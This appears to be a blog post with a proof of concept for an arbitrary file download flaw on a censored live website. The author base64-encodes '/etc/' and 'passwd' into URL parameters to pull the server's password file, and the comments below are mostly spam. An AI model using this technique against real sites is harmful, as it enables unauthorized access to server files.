While browsing i found this cool remote file download vulnerability. :)
http://www.censored.or.id/index.php?m=default&s=download&path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==&file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==&hs=true
If i open link above, it will download a file for me. Now see the path and file parameter. It's base64 encrypt.
path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==
file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==
Decrypt both value and i got this.
path=system/modules/berita/files/download/
file=presentation_final.ppt
Now i know the path and the file name. What if i change it? Let see.
path=L2V0Yy8=
file=cGFzc3dk
I changed the path value with /etc/ and file value with passwd. Encrypt it to base64 first.
http://www.censored.or.id/index.php?m=default&s=download&path=L2V0Yy8=&file=cGFzc3dk&hs=true
This modified link will download passwd file from the system.
Thats it.. :)
*some link and value in this PoC has been cencored/changed coz this is a live website.
*admin is notified by email
Comments
Web Design Services Jaipur | Web Design Company Jaipur
Logo Design Services Jaipur | Logo Design Company Jaipur
i want to ask you question: is it possible to use that to drupal?
Adamjee Textile Mills Pvt Ltd
Thank you for the informative article. I'm glad you enjoyed reading my blog post. Thank you for taking the time to check it out and for your kind words. If you have any more questions or if there's anything specific you'd like to know or discuss, feel free to reach out. Have a wonderful day!. Here is sharing some Microsoft Azure training course journey information may be its helpful to you.
Microsoft Azure Training